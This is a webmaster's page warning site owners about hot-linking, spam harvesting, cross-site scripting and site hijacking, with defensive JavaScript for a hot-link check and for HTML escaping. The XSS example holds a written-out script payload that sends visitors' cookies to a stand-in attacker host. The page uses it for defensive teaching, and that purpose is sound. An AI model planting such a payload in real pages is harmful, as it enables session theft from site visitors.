HOW WEBSITES GET PENETRATED BY EVIL-DOERS

From the Webmaster, PCGrafix.biz


How do hackers gain access to a website's sensitive data? What are a site's vulnerable areas? Who gets targeted?

To answer the last question first, ANYONE can be a target. The Internet is part of LIFE, and in LIFE, evil-doers prey and proliferate on the gullible and the naive. Even if your site is nothing more than a gallery of photographs, you can become a victim of bandwidth theft, known as hot-linking: other sites embed your images straight from your server, so you pay for their traffic.
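The usual first line of defence against hot-linking is to look at the Referer header of each image request and refuse requests that claim to come from a page on a foreign site. The following is an added example written for this page, not code from PCGrafix.biz; the allowed host list, the function names and the sample requests are all assumptions made for illustration.

```javascript
// Added example, not code from PCGrafix.biz: a Referer-based hot-link check
// for image requests. ALLOWED_HOSTS, the function names and the sample
// requests below are assumptions made for illustration.

// Hosts allowed to embed our images (assumed; use your own domain(s)).
const ALLOWED_HOSTS = new Set(['pcgrafix.biz', 'www.pcgrafix.biz']);

// True when the request appears to come from a page on a foreign site.
function isHotlinkRequest(refererHeader, allowedHosts = ALLOWED_HOSTS) {
  // No Referer at all: direct visits, bookmarks and privacy-conscious
  // browsers. Blocking these breaks legitimate visitors, so allow them.
  if (!refererHeader) return false;
  let host;
  try {
    host = new URL(refererHeader).hostname.toLowerCase();
  } catch (_err) {
    return true; // unparseable Referer: refuse rather than guess
  }
  return !allowedHosts.has(host);
}

// Decide the response for an image request given its request headers
// (header names lower-cased, as Node's http module delivers them).
function imageResponse(headers) {
  if (isHotlinkRequest(headers['referer'])) {
    return { status: 403, body: 'Hot-linking is not permitted.' };
  }
  return { status: 200, body: '<image bytes would go here>' };
}

// Constructed sample requests, not real traffic.
const SAMPLE_REQUESTS = [
  { referer: 'https://www.pcgrafix.biz/gallery.html' }, // our own page: allowed
  { referer: 'http://forum.example.net/thread/42' },     // foreign page: blocked
  {},                                                    // direct visit: allowed
];

// Returns the status each sample request would receive.
function demo() {
  return SAMPLE_REQUESTS.map((headers) => imageResponse(headers).status);
}
```

Two caveats a practitioner should keep in mind: the Referer header is supplied by the client, so this stops browsers embedding your pictures on other people's pages but not a tool that sets its own Referer; and the match is on the exact host name, so every host that is allowed to embed your images (with and without www) must be listed.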

Any interactive site can be hacked into, and the minute you include even the simplest contact form, your site is interactive. These banes of society are out to get your e-mail address, either to spam you or to sell it to a spammer; they hot-link to your pictures, application scripts or stylesheets, which costs you bandwidth; they inject malicious cross-site scripting (XSS) into your pages to hijack a visitor's session cookie or redirect visitors to fake but identical-looking pages; they spread malware (malicious scripts) to other visitors' browsers through your comments feature; they can even hijack your entire site and use it for their own criminal purposes, or harvest sensitive information from it for fraud.
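The comments-feature attack above is worth seeing concretely: a visitor posts a comment that contains script, the site pastes it into the page unchanged, and every later visitor's browser runs it and hands over its cookies. The following is an added example written for this page, not code from PCGrafix.biz; the function names and the hostile comment are constructed for illustration. It shows the vulnerable rendering beside the hardened one, and the HttpOnly cookie flag that limits the damage if some XSS still slips through.

```javascript
// Added example, not code from PCGrafix.biz: a stored cross-site scripting
// payload in a visitor comment, the vulnerable rendering that ships it to
// every other visitor, and the two defences: escape untrusted text before it
// goes into HTML, and mark the session cookie HttpOnly. The function names
// and the sample comment are constructed for illustration.

// Constructed attacker comment. When a browser executes it, the viewer's
// cookies are sent to the attacker's server.
const HOSTILE_COMMENT =
  "Nice photos! <script>new Image().src='http://attacker.example/c?'+document.cookie</script>";

// Vulnerable: the comment text is pasted straight into the page.
function renderCommentUnsafe(text) {
  return `<div class="comment">${text}</div>`;
}

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: the browser now shows the comment as text; nothing executes.
function renderCommentSafe(text) {
  return `<div class="comment">${escapeHtml(text)}</div>`;
}

// Crude check used here only to show the difference: does the output still
// contain a live <script> tag?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Defence in depth: even if some XSS slips through, HttpOnly keeps
// document.cookie from exposing the session id to injected script;
// Secure and SameSite limit where the browser will send it.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}
```

The escaping shown is correct for text placed inside an HTML element or a quoted attribute; text placed inside a script block, a URL or a style rule needs the encoding appropriate to that context instead. The same escaping defeats the redirect variant of the attack, since a comment can no longer inject a `<meta>` refresh or script that sends visitors to a look-alike page.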

It is high time for web builders to wake up to the realities of these threats. AWARENESS is the key to building defensive websites. Although constantly changing web technology has not, by itself, made applications any more secure, it is our responsibility to do everything we possibly can to prevent these bastards from achieving their goals.

This site does not have the space to go into the intricacies and technicalities of defensive structures, so we provide the list below, which references and links back to the original sources.


  1. A company that deals exclusively with web security and offers a range of security tools is Acunetix (acunetix.com). Visit this site, explore its content, and gird the loins of your website with its expertise and tools. Some salient articles are:
     1. SQL Injection
     2. Cross-Site Scripting (XSS)
     3. Web Security
     4. Directory Traversal
     5. Ajax Application Security
     6. Google Hacking
     7. Email Injection
     8. Weak HTTP Passwords